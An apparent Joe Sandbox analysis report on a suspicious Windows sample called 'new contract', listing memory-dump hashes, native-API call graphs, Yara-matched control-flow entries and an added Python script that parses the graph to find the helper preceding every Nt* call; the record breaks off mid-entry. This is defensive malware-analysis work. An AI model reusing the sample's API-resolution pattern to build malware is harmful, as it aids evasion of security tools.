• Source File: 00000000.00000002.1739909013.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_123d000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1d6a6574a9549a0b3e3afb6b38b7ba2ae3fb4d731466ae2171eb5856e4346246
• Instruction ID: b8ab55746d4dd2f4a338e4e916fbbe3f0e6e8ca00372979e3701caf7a04f04a7
• Opcode Fuzzy Hash: 1d6a6574a9549a0b3e3afb6b38b7ba2ae3fb4d731466ae2171eb5856e4346246
• Instruction Fuzzy Hash: 822136B5614209DFDB01DF58D9C0B56BF65FBD4324F60C568DA0A0B246C336E416CBA1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1739948322.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_124d000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 001e6e09cd83bd4d060853e1382f06299aee009bd2a9dbb0f99c1f76899280c9
                                                                                                                                                                            • Instruction ID: 25860d7c7ea4754681a38f3de11d6ebe7064790b0452c4202f70c10b0d9afc4e
                                                                                                                                                                            • Opcode Fuzzy Hash: 001e6e09cd83bd4d060853e1382f06299aee009bd2a9dbb0f99c1f76899280c9
                                                                                                                                                                            • Instruction Fuzzy Hash: BE213771614209EFDB09DF98C9C4B25BBA5FB94324F20C66DE90A4B343C376D806CB61
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1739948322.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_124d000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e2d63cfd2f2b9917c9650fec84a6aa4a016629739062760a6e825e87ddf3c448
                                                                                                                                                                            • Instruction ID: 05af787c2ab8fd47948c43d39025d811c8585a0ae22ab02e143a2926c88391b0
                                                                                                                                                                            • Opcode Fuzzy Hash: e2d63cfd2f2b9917c9650fec84a6aa4a016629739062760a6e825e87ddf3c448
                                                                                                                                                                            • Instruction Fuzzy Hash: 64212575614208DFCB19DF58D8C4B16BBA5FBA4314F20C96DD90A0B342C37AD407CA61
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1739948322.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_124d000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 29e9b0971248212cd418e4598a04f537456ff03b0e411d730e12232672f44b14
                                                                                                                                                                            • Instruction ID: da02ad86e5ca8702c99483095b7df661be69bb891367459996344cbdcb935043
                                                                                                                                                                            • Opcode Fuzzy Hash: 29e9b0971248212cd418e4598a04f537456ff03b0e411d730e12232672f44b14
                                                                                                                                                                            • Instruction Fuzzy Hash: D8219F755083849FCB07CF64D994B11BF71EB56314F28C5EAD9498F2A7C33A980ACB62
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1739909013.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_123d000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                                                                            • Instruction ID: eb7a0a46eeda1f4e1a1662dca796147fede52554656a36a03729d001b716dd9e
                                                                                                                                                                            • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                                                                            • Instruction Fuzzy Hash: 7A1103B6504284CFCB12CF54D5C4B16BF72FB84324F24C6A9D9090B297C336D45ACBA1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1739909013.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_123d000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                                                                            • Instruction ID: 49325dcffbb52a754b81144e75f9441fcc2d7bdf765574b49e34c6ca5705f521
                                                                                                                                                                            • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                                                                            • Instruction Fuzzy Hash: 7E1103B6504285CFDB02CF54D5C4B56BF72FB84324F24C2A9DA090B257C33AE45ACBA1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1739948322.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_124d000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                                                                            • Instruction ID: 019b44d71fd9e2b0d14c3aba7c5c2239eeaeaabc99143f917a5bcaa58f9b5d80
                                                                                                                                                                            • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                                                                            • Instruction Fuzzy Hash: 5211BB75944285DFDB06CF54C5C4B15BBB2FB84224F24C6ADD9494B297C33AD40ACB61
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744229333.00000000077A0000.00000004.08000000.00040000.00000000.sdmp, Offset: 077A0000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1744265645.00000000077B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_77a0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2e3d80e92c94b04800db846ddc33c5071c363f571cc418160d6b7630bf53a888
                                                                                                                                                                            • Instruction ID: 170734038df4e40b6ab11b2e078a885c222e05f4a42294c6f7c28aa1322af0da
                                                                                                                                                                            • Opcode Fuzzy Hash: 2e3d80e92c94b04800db846ddc33c5071c363f571cc418160d6b7630bf53a888
                                                                                                                                                                            • Instruction Fuzzy Hash: 68A2C37148E3C19FC7578B7088B55817FB0AE1322475E86EFD4C18E4A3E3AD585ACB62
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 7c36995146cf2c0492e6208bcc115fef1f354bf3681ece6f0894fbb59d50ad5d
                                                                                                                                                                            • Instruction ID: 4bc3dd8030917d353c57109138ff3ac93deee450200cb1cf8fe1197dd244438f
                                                                                                                                                                            • Opcode Fuzzy Hash: 7c36995146cf2c0492e6208bcc115fef1f354bf3681ece6f0894fbb59d50ad5d
                                                                                                                                                                            • Instruction Fuzzy Hash: 1DE1E9B4E006198FDB14EFA9C5909AEFBB2BF89305F248169D414AB355D731A942CF60
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0d3017a5449c9e84db9724edabbf0764f413aa15b6eadef080491648b0dafc54
                                                                                                                                                                            • Instruction ID: 93de8e6c8f833698410ad2d2278f5ffa0480b3f5f6126300a761c19b19270a0c
                                                                                                                                                                            • Opcode Fuzzy Hash: 0d3017a5449c9e84db9724edabbf0764f413aa15b6eadef080491648b0dafc54
                                                                                                                                                                            • Instruction Fuzzy Hash: 47E1DAB4E002198FDB54DFA9C5909AEFBB2FF89304F24C169D914AB355D731A941CFA0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6afdf32ac76fd87257c21a46f9af7bb5397a39ffc757769cc8fc506a3e33555c
                                                                                                                                                                            • Instruction ID: ebe137bd586c7afdda8e437dc690a350c4536e481f631cec375aadaa163e6668
                                                                                                                                                                            • Opcode Fuzzy Hash: 6afdf32ac76fd87257c21a46f9af7bb5397a39ffc757769cc8fc506a3e33555c
                                                                                                                                                                            • Instruction Fuzzy Hash: 2EE1E8B4E006198FDB14EFA9C5909AEFBB2FF89304F24C169D815AB355D731A941CFA0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1de8fffccdd4478ec1c720796ac9b4a7bf67eb95fe52377d85b468595faa5de5
• Instruction ID: 00b23ec8527efda0a7a52df048100bc4b460e098c33b35e446a13496125c7f7c
• Opcode Fuzzy Hash: 1de8fffccdd4478ec1c720796ac9b4a7bf67eb95fe52377d85b468595faa5de5
• Instruction Fuzzy Hash: 2EE1F9B4E006198FDB14EFA9C5909AEFBB2FF89304F24C169D815AB356D731A941CF60
Memory Dump Source
• Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4fbf14b0c27f9c63ba744a99eface30057b1ed6e13cd431cb7e91b8854ecf8b5
• Instruction ID: c6bb3a1af7dad8500657ad6d8381ed84f71c410207bf787ec2e14edd7be67cc4
• Opcode Fuzzy Hash: 4fbf14b0c27f9c63ba744a99eface30057b1ed6e13cd431cb7e91b8854ecf8b5
• Instruction Fuzzy Hash: 90E1F7B4E006198FDB14EFA9C5909AEFBB2FF89304F24C169D819AB355D731A941CF60
Memory Dump Source
• Source File: 00000000.00000002.1740410536.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_14b0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8bdd95464ee7b5240b6419548103e80c598eefb1c61a41844beb647835d9772b
• Instruction ID: bde17713de39bfd3b44febfb289263790699b2085dc2d485d305c494f07180af
• Opcode Fuzzy Hash: 8bdd95464ee7b5240b6419548103e80c598eefb1c61a41844beb647835d9772b
• Instruction Fuzzy Hash: A1A16F36E1020A8FCF05DFB5C8805DEB7B2FF95300B15456BE909AB261DB31E91ACB50
Memory Dump Source
• Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cd88dcd50b8059ab43eeba55013fbb82a5c25e0d083d4a8a17a22e36028eb4b6
• Instruction ID: 6e23b73d1a367378c6823a67ee0efd576e592b9f5a1776db6864a6d1f04315a5
• Opcode Fuzzy Hash: cd88dcd50b8059ab43eeba55013fbb82a5c25e0d083d4a8a17a22e36028eb4b6
• Instruction Fuzzy Hash: 94510AB5E0021A8BDB14DFA9C5915AEFBF2FF89304F24C169D518AB316D7319942CFA0
Memory Dump Source
• Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2a59285d2a819a38e2520b9ac1e7c6431dc46f6c00574b51312a52b42fac81f2
• Instruction ID: a154796e0722b3f9e78715813a5d686904f61cb9cb07a9df0cd358c9e8062391
• Opcode Fuzzy Hash: 2a59285d2a819a38e2520b9ac1e7c6431dc46f6c00574b51312a52b42fac81f2
• Instruction Fuzzy Hash: 4F51FAB5E006198FDB14DFA9C5805AEFBF6BF89304F24C169D418AB315D7319942CFA0

Execution Graph

Execution Coverage:1.3%
Dynamic/Decrypted Code Coverage:2.7%
Signature Coverage:5.8%
Total number of Nodes:555
Total number of Limit Nodes:72
execution_graph (node/edge dump of the rendered graph, reduced to what is recoverable from it)
• Root 41f180 -> 41b930, which calls 409d30 and 40c1b0 and exits through 41a670 (ExitProcess at 41a68f).
• Every native-API wrapper first calls 41af20 (labelled LdrLoadDll; it reaches 414e40 -> 4152c0 LdrLoadDll) and then its call site: 41a320 -> NtCreateFile at 41a33c; 41a3d0 -> NtReadFile at 41a3ec; 41a450 -> NtClose at 41a46c; 41a500 -> NtAllocateVirtualMemory at 41a51c; 41a5f0 -> RtlAllocateHeap at 41a60c; 41a630 -> RtlFreeHeap at 41a64c; 41a790 -> LookupPrivilegeValueW at 41a7af.
• 408310 -> 40ace0 (LdrLoadDll) -> 414e40 (LdrLoadDll) -> PostThreadMessageW at 40835c.
• Twelve small wrappers (419de0, 419e50, 419e80, 419ec0, 419f80, 419fd0, 41a020, 41a1e0, 41a220, 41a4c0, 41a540, 41a580) call 41af20 and then reach a stub in the 1662ad0-1662fb0 range that the plugin labels LdrInitializeThunk.
• 41ad30 calls 41abf0 (LdrLoadDll via 414e40) forty times in a row (41ad44 ... 41aeac) before returning to 41b208 -> 419e80.
• Collapsed sub-graphs: 4087a0 (19 API calls), 4083a0 (11), 40f700 (10), 414a40 (8), 40f490 (3), 414060 (3), 41d020 (3), 41bd00 (2), 41bd80 (2), 41bf50 (2), 41cef0 (2), 414780 (LdrLoadDll NtReadFile NtClose), 414640 (LdrLoadDll NtClose LdrInitializeThunk x2), 40c4b0 (LdrLoadDll NtClose LdrInitializeThunk x3), 41cf90 (LdrLoadDll RtlAllocateHeap RtlFreeHeap), 41bf90 (LdrLoadDll RtlAllocateHeap), 41cf50 (LdrLoadDll RtlFreeHeap), 40f5e0 (LdrLoadDll NtClose).
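The execution graph is emitted by the report as a flat token stream ("<id> <addr> [API ...]" for nodes, "<id>-><id>" for edges, "<N> API calls" for collapsed sub-graphs), which is awkward to read but easy to mine. The Python below is an added example and not code from the Joe Sandbox report: it parses that stream, lists the native-API call sites reachable from a chosen root, and computes which node precedes every Nt* call site. The SAMPLE string is a constructed excerpt assembled from fragments of the graph above (the 414a40 path that creates, reads and closes a file); the node ids and addresses are the report's, the function names and the reading of 41af20 as an export-resolution helper are this example's assumptions.

```python
"""Parse the execution_graph token stream of a Joe Sandbox report (example, not report code)."""
import re
from collections import deque

# Constructed excerpt: fragments of the graph above covering the 414a40 path that
# creates, reads and closes a file. Node ids and addresses are the report's own;
# which fragments were kept is this example's choice.
SAMPLE = """execution_graph 97891 414a40 97892 414d75 97891->97892 97893 414a54 97891->97893
97893->97892 97956 419c10 97893->97956 97957 414b34 97956->97957 97958 41af20 LdrLoadDll
97956->97958 97957->97896 97958->97957 97896 414b80 97959 41a320 97896->97959
97960 41a33c NtCreateFile 97959->97960 97961 41af20 LdrLoadDll 97959->97961 97960->97901
97961->97960 97901 414ba7 97902 41bd80 2 API calls 97901->97902 97905 414bb3 97902->97905
97910 414c42 97905->97910 97911 414ca9 97910->97911 97912 414cbc 97911->97912
98018 41a2a0 97912->98018 98019 414d04 98018->98019 98020 41af20 LdrLoadDll 98018->98020
98021 41a2e0 LdrLoadDll 98019->98021 98020->98019 98021->97926 97926 414d1c
98022 41a450 97926->98022 98023 41a46c NtClose 98022->98023 98024 41af20 LdrLoadDll
98022->98024 98023->97929 98024->98023 97913 414c51 97910->97913 97916 414c6a 97913->97916
97917 414c87 97916->97917 97974 414400 97917->97974 97976 41447e 97974->97976
97981 41449a 97976->97981 97986 4144b5 97981->97986 97988 4144d1 97986->97988
97993 4144ec 97988->97993 98001 4144f1 97993->98001 98030 41a3d0 98001->98030
98031 41af20 LdrLoadDll 98030->98031 98032 41a3ec NtReadFile 98031->98032 98032->98002
98002 414557"""

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")


def parse_execution_graph(text):
    """Return (nodes, edges) from the flat token stream.

    Grammar as it appears in the report: a node is "<id> <addr>", optionally followed
    by API names or by "<N> API calls" (a collapsed sub-graph); an edge is "<id>-><id>".
    The address is consumed right after the id without inspection, because addresses
    such as 414400 are all-digit hex and would otherwise look like node ids.
    """
    toks = text.split()
    nodes, edges = {}, []
    current, i = None, 0
    while i < len(toks):
        tok = toks[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges.append((edge.group(1), edge.group(2)))
            i += 1
        elif tok.isdigit() and toks[i + 1:i + 3] == ["API", "calls"]:
            nodes[current]["summary"] = f"{tok} API calls"
            i += 3
        elif tok.isdigit():
            current = tok
            addr = toks[i + 1] if i + 1 < len(toks) else ""
            nodes[current] = {"addr": addr, "apis": [], "summary": None}
            i += 2
        else:
            if current is not None:          # API name such as NtReadFile or LdrLoadDll
                nodes[current]["apis"].append(tok)
            i += 1                           # otherwise the leading "execution_graph" label
    return nodes, edges


def reachable(edges, root):
    """Node ids reachable from root, following edges forward (BFS)."""
    succ = {}
    for src, dst in edges:
        succ.setdefault(src, []).append(dst)
    seen, queue = {root}, deque([root])
    while queue:
        for nxt in succ.get(queue.popleft(), []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return seen


def native_api_sites(nodes, edges, root, prefixes=("Nt", "Zw")):
    """Sorted (address, api) pairs for nodes reachable from root that call a native API."""
    sites = []
    for nid in reachable(edges, root):
        node = nodes.get(nid)                # edges may point at nodes outside the excerpt
        if node:
            sites += [(node["addr"], api) for api in node["apis"] if api.startswith(prefixes)]
    return sorted(sites)


def common_predecessor_addrs(nodes, edges, prefixes=("Nt", "Zw")):
    """Addresses of nodes that directly precede every native-API node.

    On this report's graph that is 41af20, the LdrLoadDll-labelled helper each Nt*
    wrapper runs immediately before its call site (assumed here to resolve the export).
    """
    preds = {}
    for src, dst in edges:
        preds.setdefault(dst, set()).add(src)
    common = None
    for nid, node in nodes.items():
        if any(api.startswith(prefixes) for api in node["apis"]):
            addrs = {nodes[p]["addr"] for p in preds.get(nid, ()) if p in nodes}
            common = addrs if common is None else common & addrs
    return sorted(common or ())


if __name__ == "__main__":
    nodes, edges = parse_execution_graph(SAMPLE)
    root = next(iter(nodes))                 # first node of the stream, 414a40 here
    for addr, api in native_api_sites(nodes, edges, root):
        print(f"{api:<22} at {addr}")
    print("helper before every Nt* call:", common_predecessor_addrs(nodes, edges))
```

Run against the full dump, the same two functions give the complete set of Nt* sites under the 41f180 root and confirm that 41af20 is the single node shared by all of them, which is the call pattern to look for when deciding where to hook or break in a debugger.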

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 0 41a3d0-41a419 call 41af20 NtReadFile
APIs
• NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A415
Strings
Memory Dump Source
• Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_new contract.jbxd
Yara matches
Similarity
• API ID: FileRead
• String ID: !JA$bMA$bMA
• API String ID: 2738559852-4222312340
• Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
• Instruction ID: 54437c4e75339082d0912fbe7e6c9053912bd6928cda1a9760da43cab1c95c7d
• Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
• Instruction Fuzzy Hash: C3F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241D630E8518BA4

APIs
• NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D
Memory Dump Source
• Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_new contract.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 0ea889096db265b473ee1470c5806ee9c5d231ad54aca8319adbd717bc589d4c
• Instruction ID: b8eec153ef1fd2cb2105d6bf2324f222409db7b37a7476c19455854edcf70504
• Opcode Fuzzy Hash: 0ea889096db265b473ee1470c5806ee9c5d231ad54aca8319adbd717bc589d4c
• Instruction Fuzzy Hash: DE11E2B2205208AFDB08DF89DC85EEB77ADEF8C754F158249FA1D97241C630E851CBA4

APIs
• LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
Memory Dump Source
• Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_new contract.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
• Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
• Instruction ID: 93036d1b31c8ba6342ae8de3f2893f5930aff37f33252288d1eb8296453bc5b5
• Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
• Instruction Fuzzy Hash: FF015EB5E0020DABDB10EBA1DC42FDEB3789F14308F0041AAE908A7281F634EB54CB95

APIs
• NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D
Memory Dump Source
• Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_new contract.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
• Instruction ID: 30690d9e011530b668ed3b4ae7cc5c3fda29d367b226dbf4f68f65ca016a7565
• Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
• Instruction Fuzzy Hash: FDF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

APIs
• NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
Memory Dump Source
• Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_new contract.jbxd
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
• Instruction ID: c35769ceed384df61eeb5fc049e905e887b244236103aac277853e7772ac0dd9
• Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
• Instruction Fuzzy Hash: 75F015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241C630F811CBA4

APIs
• NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
Memory Dump Source
• Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_new contract.jbxd
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: 9fe5d1c93b6a8fe11bef04f7bb6d9af7ce8ae07c87cfedba4cbb00d36a3d9ab0
• Instruction ID: 5813a21dc4d1d5848b4b92187edf154de6f784026548f02ae2aefde2e4efb888
• Opcode Fuzzy Hash: 9fe5d1c93b6a8fe11bef04f7bb6d9af7ce8ae07c87cfedba4cbb00d36a3d9ab0
• Instruction Fuzzy Hash: 68E0C2726411106BD720DBA4DC86EEB7B28EF44324F1845ADFA4CDB242C534E61087D0

APIs
• NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
Memory Dump Source
• Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_new contract.jbxd
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
• Instruction ID: e48275ca6f7768b9f0fd4fab79f6d7fda959a909e55c262f35bdb2090c9231ed
• Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
• Instruction Fuzzy Hash: E5D01776200214ABD710EB99DC85EE77BADEF48764F15449ABA189B242C530FA1086E0

APIs
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: ccb6725167cf3c6fcc5f46eae2291cf729cf734ab64d7158a4eff0fe6b893c86
• Instruction ID: c094ff774621442249ccdcac35c2955db6d1e2b771fcc15579f40e1bd43956a3
• Opcode Fuzzy Hash: ccb6725167cf3c6fcc5f46eae2291cf729cf734ab64d7158a4eff0fe6b893c86
• Instruction Fuzzy Hash: 1D90026120240003410575584818617400E97E0201B55C131E5014690EC5258D916225

APIs
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 69a36abefe46d9a1aa9cd6432f09e5cc93e9e2ff33ae8a20f84b353b267e25f5
• Instruction ID: c6849e1bfd3c8cf7815ecd82bb5a9ea22b1dd29454d0924a70bef014fda25150
• Opcode Fuzzy Hash: 69a36abefe46d9a1aa9cd6432f09e5cc93e9e2ff33ae8a20f84b353b267e25f5
• Instruction Fuzzy Hash: 1490023120140802D1807558480864B000997D1301F95C125A4025754ECA158F5977A1
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
